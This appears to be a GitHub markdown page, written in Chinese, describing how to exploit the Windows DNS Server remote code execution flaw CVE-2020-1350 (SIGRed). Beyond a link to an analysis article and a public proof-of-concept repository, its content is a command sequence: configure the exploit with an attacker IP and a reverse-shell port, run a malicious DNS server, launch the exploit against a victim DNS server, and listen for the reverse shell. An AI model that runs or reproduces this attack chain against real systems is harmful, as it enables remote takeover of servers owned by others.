Skip to content

Latest commit

 

History

History
32 lines (21 loc) · 762 Bytes

DNS Server远程代码执行漏洞(CVE-2020-1350).md

File metadata and controls

32 lines (21 loc) · 762 Bytes

DNS Server远程代码执行漏洞(CVE-2020-1350)

关于此漏洞的详细信息:https://www.graplsecurity.com/post/anatomy-of-an-exploit-rce-with-cve-2020-1350-sigred

漏洞利用:

sudo python3 configure.py -ip IP_ATTACKER -p PORT_REVERSE_SHELL -hp PORT_APACHE_SERVER (default 80)
sudo python3 evildns.py

需要sudo监听UDP和TCP端口53

然后运行:

python3 exploit.py -ip WINDNS_VICTIM_IP -d EVIL_DOMAIN

设置反弹shell的监听:

python3 reverse_shell/server.py -p PORT_REVERSE_SHELL

poc:https://github.com/chompie1337/SIGRed_RCE_PoC

ref: